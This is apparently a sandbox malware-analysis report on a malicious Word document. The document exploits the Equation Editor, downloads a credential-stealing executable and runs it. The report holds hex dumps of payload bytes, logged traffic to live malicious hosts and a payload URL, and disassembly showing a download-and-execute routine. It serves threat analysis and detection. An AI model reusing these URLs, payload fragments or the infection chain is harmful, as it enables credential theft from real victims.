May 6, 2024 14:59:19.598961115 CEST	1289	IN	Data Raw: 28 79 00 00 0a 02 7b 14 00 00 04 6f 7a 00 00 0a 00 02 28 79 00 00 0a 02 7b 13 00 00 04 6f 7a 00 00 0a 00 02 28 79 00 00 0a 02 7b 12 00 00 04 6f 7a 00 00 0a 00 02 28 79 00 00 0a 02 7b 11 00 00 04 6f 7a 00 00 0a 00 02 28 79 00 00 0a 02 7b 10 00 00 Data Ascii: (y{oz(y{oz(y{oz(y{oz(y{oz(y{oz(y{oz(y{ozrp(nrpors{(\|(}(~*0rp}(O
May 6, 2024 14:59:19.598974943 CEST	1289	IN	Data Raw: 01 73 4f 00 00 06 0a 02 06 6f 51 00 00 06 7d 18 00 00 04 00 11 0c 17 58 13 0c 11 0c 11 08 17 59 fe 04 13 0d 11 0d 2d c7 00 2a 00 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 02 7b 18 00 00 04 0a 2b 00 06 2a 76 00 02 03 16 98 69 7d 19 00 00 04 02 03 Data Ascii: sOoQ}XY-0{+vi}i}}vi}i}}0D,{{{o+{{{o"(0rp}
May 6, 2024 14:59:19.598987103 CEST	1289	IN	Data Raw: 1f 00 00 04 2b 73 00 28 8c 00 00 0a 73 89 00 00 0a 80 1f 00 00 04 2b 61 00 28 8d 00 00 0a 73 89 00 00 0a 80 1f 00 00 04 2b 4f 00 28 8e 00 00 0a 73 89 00 00 0a 80 1f 00 00 04 2b 3d 00 28 76 00 00 0a 73 89 00 00 0a 80 1f 00 00 04 2b 2b 00 28 8f 00 Data Ascii: +s(s+a(s+O(s+=(vs++(s+rprOp(}$+8rp(-Crp(-Hrp(-Mrp(-Rrp(-Wrp(-\+l(s +s(s
May 6, 2024 14:59:19.599000931 CEST	1289	IN	Data Raw: 00 2a 1b 30 02 00 b6 00 00 00 18 00 00 11 00 14 0a 73 a2 00 00 0a 0b 07 72 0f 08 00 70 6f a3 00 00 0a 00 07 72 53 08 00 70 6f a4 00 00 0a 00 07 72 87 07 00 70 6f 9b 00 00 0a 00 07 72 5b 08 00 70 6f 9b 00 00 0a 00 07 18 6f a5 00 00 0a 00 07 17 6f Data Ascii: 0srporSporpor[poooo,_o%,,oerpo((&{(o(orkoW)40s
May 6, 2024 14:59:19.599014997 CEST	1289	IN	Data Raw: 00 04 20 88 01 00 00 20 2b 01 00 00 73 6f 00 00 0a 6f 70 00 00 0a 00 28 bb 00 00 0a 72 69 09 00 70 18 17 8d 10 00 00 01 25 16 07 a2 28 bc 00 00 0a 75 40 00 00 01 13 06 11 06 6f bd 00 00 0a 16 9a 13 07 11 07 6f be 00 00 0a 17 9a 13 08 11 08 16 8c Data Ascii: +soop(rip%(u@ooqP%~&%~&%rspo&{o{o{+(ow{+rYp"Asjok{+(vo{+s lslom
May 6, 2024 14:59:19.599030018 CEST	1289	IN	Data Raw: 00 04 72 c3 0a 00 70 6f cc 00 00 0a 00 02 7b 35 00 00 04 02 fe 06 3c 00 00 06 73 7b 00 00 0a 6f cd 00 00 0a 00 02 7b 31 00 00 04 72 cd 0a 00 70 6f ca 00 00 0a 00 02 7b 31 00 00 04 1f 2c 1f 14 73 6f 00 00 0a 6f cb 00 00 0a 00 02 7b 31 00 00 04 72 Data Ascii: rpo{5<s{o{1rpo{1,soo{1rpo{1:s{o{2oi{2/*slom{2rpon{2soop{2oq{2rpor{6(ow{6rY
May 6, 2024 14:59:19.751718044 CEST	1289	IN	Data Raw: 00 00 0a 00 2a 00 00 13 30 05 00 c8 00 00 00 1d 00 00 11 02 72 01 00 00 70 7d 40 00 00 04 02 72 01 00 00 70 7d 41 00 00 04 02 28 1b 00 00 0a 00 00 02 03 6f 1e 00 00 0a 7d 41 00 00 04 03 0b 07 0a 06 72 ff 06 00 70 28 87 00 00 0a 2d 02 2b 0e 00 02 Data Ascii: 0rp}@rp}A(o}Arp(-+rSp}@+\|rpo,`O%;o+9rp(,(&o(PXi2+(P+0YO%

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	109.71.253.25	443	1516	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-05-06 12:59:06 UTC	112	OUT	HEAD /u7xc HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: wbze.de
2024-05-06 12:59:06 UTC	384	IN	HTTP/1.1 302 Found Date: Mon, 06 May 2024 12:59:06 GMT Server: Apache/2.4.38 (Debian) X-Powered-By: Express Location: http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc Vary: Accept Content-Type: text/plain; charset=utf-8 Content-Length: 185 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.22	49165	109.71.253.25	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 12:59:11 UTC	124	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: wbze.de
2024-05-06 12:59:11 UTC	247	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 12:59:11 GMT Server: Apache/2.4.38 (Debian) X-Powered-By: Express Allow: GET,HEAD Content-Type: text/html; charset=utf-8 Content-Length: 8 ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg" Connection: close
2024-05-06 12:59:11 UTC	8	IN	Data Raw: 47 45 54 2c 48 45 41 44 Data Ascii: GET,HEAD

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.22	49166	109.71.253.25	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 12:59:12 UTC	154	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 62 7a 65 2e 64 65 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: wbze.de
2024-05-06 12:59:13 UTC	276	IN	HTTP/1.1 404 Not Found Date: Mon, 06 May 2024 12:59:13 GMT Server: Apache/2.4.38 (Debian) X-Powered-By: Express Content-Security-Policy: default-src 'none' X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Content-Length: 144 Connection: close
2024-05-06 12:59:13 UTC	144	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.22	49167	109.71.253.25	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 12:59:14 UTC	154	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 62 7a 65 2e 64 65 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: wbze.de
2024-05-06 12:59:14 UTC	276	IN	HTTP/1.1 404 Not Found Date: Mon, 06 May 2024 12:59:14 GMT Server: Apache/2.4.38 (Debian) X-Powered-By: Express Content-Security-Policy: default-src 'none' X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Content-Length: 144 Connection: close
2024-05-06 12:59:14 UTC	144	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49169	109.71.253.25	443	1516	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-05-06 12:59:15 UTC	342	OUT	GET /u7xc HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: wbze.de Connection: Keep-Alive
2024-05-06 12:59:15 UTC	384	IN	HTTP/1.1 302 Found Date: Mon, 06 May 2024 12:59:15 GMT Server: Apache/2.4.38 (Debian) X-Powered-By: Express Location: http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc Vary: Accept Content-Type: text/plain; charset=utf-8 Content-Length: 185 Connection: close
2024-05-06 12:59:15 UTC	185	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 33 33 2e 33 34 2f 78 61 6d 70 70 2f 72 7a 7a 2f 72 7a 2f 62 65 61 75 74 69 66 75 6c 61 6e 69 6d 61 6b 69 6e 67 73 61 79 69 6e 67 73 68 65 77 61 73 72 65 61 6c 6c 79 62 65 61 75 74 69 66 75 6c 74 6f 67 6f 66 72 6f 6d 74 68 65 65 6e 74 69 72 65 6b 69 6e 67 64 6f 6d 74 6f 75 6e 64 65 72 73 74 61 6e 64 68 6f 77 6d 75 63 68 73 68 65 6c 6f 76 65 64 5f 5f 5f 68 65 72 6c 61 6e 64 61 6e 64 68 75 73 62 61 6e 64 73 68 65 69 73 67 6f 6f 64 2e 64 6f 63 Data Ascii: Found. Redirecting to http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49171	109.71.253.25	443	1516	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-05-06 12:59:17 UTC	131	OUT	HEAD /u7xc HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: wbze.de Content-Length: 0 Connection: Keep-Alive
2024-05-06 12:59:17 UTC	384	IN	HTTP/1.1 302 Found Date: Mon, 06 May 2024 12:59:17 GMT Server: Apache/2.4.38 (Debian) X-Powered-By: Express Location: http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc Vary: Accept Content-Type: text/plain; charset=utf-8 Content-Length: 185 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49173	104.26.13.205	443	3296	C:\Users\user\AppData\Roaming\html.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 12:59:29 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-05-06 12:59:29 UTC	211	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 12:59:29 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 87f925d5690c498e-MIA
2024-05-06 12:59:29 UTC	12	IN	Data Raw: 38 34 2e 31 37 2e 34 30 2e 31 30 31 Data Ascii: 84.17.40.101

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49174	172.67.74.152	443	3532	C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 12:59:41 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-05-06 12:59:41 UTC	211	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 12:59:41 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 87f926218eb23343-MIA
2024-05-06 12:59:41 UTC	12	IN	Data Raw: 38 34 2e 31 37 2e 34 30 2e 31 30 31 Data Ascii: 84.17.40.101

Target ID:	0
Start time:	14:59:00
Start date:	06/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fec0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:59:16
Start date:	06/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:59:21
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Roaming\html.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\html.exe"
Imagebase:	0x13c0000
File size:	753'152 bytes
MD5 hash:	4C8B56B125AE41293AA6028204D44268
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.398826908.00000000004F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.399016918.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.399016918.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 37%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:59:27
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Roaming\html.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\html.exe"
Imagebase:	0x13c0000
File size:	753'152 bytes
MD5 hash:	4C8B56B125AE41293AA6028204D44268
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.656186717.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	14:59:36
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
Imagebase:	0xc90000
File size:	753'152 bytes
MD5 hash:	4C8B56B125AE41293AA6028204D44268
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.421607400.0000000002151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.421607400.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 37%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:59:39
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
Imagebase:	0xc90000
File size:	753'152 bytes
MD5 hash:	4C8B56B125AE41293AA6028204D44268
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.455352786.0000000002340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:59:41
Start date:	06/05/2024
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Imagebase:	0x13c0000
File size:	2'525'680 bytes
MD5 hash:	2F8D93826B8CBF9290BC57535C7A6817
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	14:59:44
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
Imagebase:	0xc90000
File size:	753'152 bytes
MD5 hash:	4C8B56B125AE41293AA6028204D44268
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:59:46
Start date:	06/05/2024
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Imagebase:	0x350000
File size:	9'805'808 bytes
MD5 hash:	326A645391A97C760B60C558A35BB068
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	14:59:48
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
Imagebase:	0xc90000
File size:	753'152 bytes
MD5 hash:	4C8B56B125AE41293AA6028204D44268
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.656194441.0000000002407000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	28.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	72.2%
Total number of Nodes:	97
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0361062C Relevance: 6.1, APIs: 4, Instructions: 85
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(0361061E), ref: 0361062C

Part of subcall function 03610646: URLDownloadToFileW.URLMON(00000000,03610657,?,00000000,00000000), ref: 0361069F
Part of subcall function 03610646: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036106DD
Part of subcall function 03610646: ExitProcess.KERNEL32(00000000), ref: 036106F5

Memory Dump Source

Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 27f4a37bb9126cd1424baba16c8d825596ae9fbf4fbf8c31fda54954d1e47cc1
Instruction ID: 39e8b86a4b0b73e745b57bd81547643ff5c6a8a6ba490b8fb1f687eab1044be8
Opcode Fuzzy Hash: 27f4a37bb9126cd1424baba16c8d825596ae9fbf4fbf8c31fda54954d1e47cc1
Instruction Fuzzy Hash: 05216B9285C3C12EDB23A7300D7EB65BF645FA7200F5D49CEE0C20A4E3E6985461C79B

Uniqueness

Uniqueness Score: -1.00%

Function 036105B8 Relevance: 4.6, APIs: 3, Instructions: 124
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03610657,?,00000000,00000000), ref: 0361069F
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036106DD
ExitProcess.KERNEL32(00000000), ref: 036106F5

Memory Dump Source

Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 3f37c819cc26392aa2a732347964719394f64c6d0f495c3a0bdaf2d44c4be55a
Instruction ID: 082dad1804098b96361765f2bd5b9077c0ae0e50e31307c2691d8b78ca6b89f5
Opcode Fuzzy Hash: 3f37c819cc26392aa2a732347964719394f64c6d0f495c3a0bdaf2d44c4be55a
Instruction Fuzzy Hash: F2419A9685D3C12FDB23E7300D6EB95BF606F93100F5D89CEE0C64E0A3E6989561C79A

Uniqueness

Uniqueness Score: -1.00%

Function 03610646 Relevance: 4.6, APIs: 3, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: c9cebbbb7176e8bfe429d5c5c939099a6d6f70f65e7756ece03e266012943be0
Instruction ID: 4a2bcc1e8dfb05917ca57b4830bfbb099b52a8b78bd8a6d1099b6e25617b8732
Opcode Fuzzy Hash: c9cebbbb7176e8bfe429d5c5c939099a6d6f70f65e7756ece03e266012943be0
Instruction Fuzzy Hash: 1621159695C3C12EDB2397300C6DB65BF641FA7600F5D89CEE1C20A4E3E6A84461C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0361069D Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03610657,?,00000000,00000000), ref: 0361069F

Part of subcall function 036106B6: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036106DD
Part of subcall function 036106B6: ExitProcess.KERNEL32(00000000), ref: 036106F5

Memory Dump Source

Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: 3ad3357797ad8dad50bbb3117a404f79ccedce27a798ca2dea4b1d4b6cc28870
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: 00F0E2A669C34079FE12F7740C5EFAA6E189FC1700F1C0889B1414D0D2E89488A0865D

Uniqueness

Uniqueness Score: -1.00%

Function 036106CB Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036106DD

Part of subcall function 036106F0: ExitProcess.KERNEL32(00000000), ref: 036106F5

Memory Dump Source

Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 06e1d0eee2adc51e369a0e9b1ccb9e91c6bc978165c2f265fcfb17c4669d5476
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 6301446FA9434371EF30F638495DBF6AA45AB81700FCC8856B980481C1D09894F38E1D

Uniqueness

Uniqueness Score: -1.00%

Function 036106B6 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: 7c8c36467827b3521cba9a46727b9b89fe106a55064b6b003724ba05cff36243
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: 29017D2B55830271FF71F6340D8CBEAAA859B81700F9C846AF18048080D28448F3CE1D

Uniqueness

Uniqueness Score: -1.00%

Function 036106F0 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
